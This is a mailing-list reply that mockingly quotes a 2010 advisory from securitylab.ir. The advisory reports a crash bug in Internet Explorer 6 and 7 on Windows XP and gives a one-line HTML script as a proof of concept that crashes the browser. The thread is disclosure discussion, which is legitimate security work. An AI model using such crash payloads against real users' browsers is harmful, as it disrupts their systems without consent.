Wow, a *crash exploit*!!! Amazing!!! How on earth did you discover it!?!? Berend-Jan Wever <berendjanwever@xxxxxxxxx> http://skypher.com/SkyLined On Tue, Jan 26, 2010 at 12:35 PM, <info@xxxxxxxxxxxxxx> wrote: > > ################################################################# > # Securitylab.ir > ################################################################# > # Application Info: > # Name: Microsoft IE > # Version: 6 & 7 > # Tested on : XP(SP1/SP2/SP3) > ################################################################# > # Vulnerability Info: > # Type: Crash > # Risk: Medium > ################################################################# > Vulnerability: > > IE.html > <script>document.createElement("html").outerHTML</script> > ################################################################# > # Discoverd By: Pouya Daneshmand > # Website: http://securitylab.ir > # Contacts: info[at]securitylab.ir & whh_iran@xxxxxxxxx > ###################################################################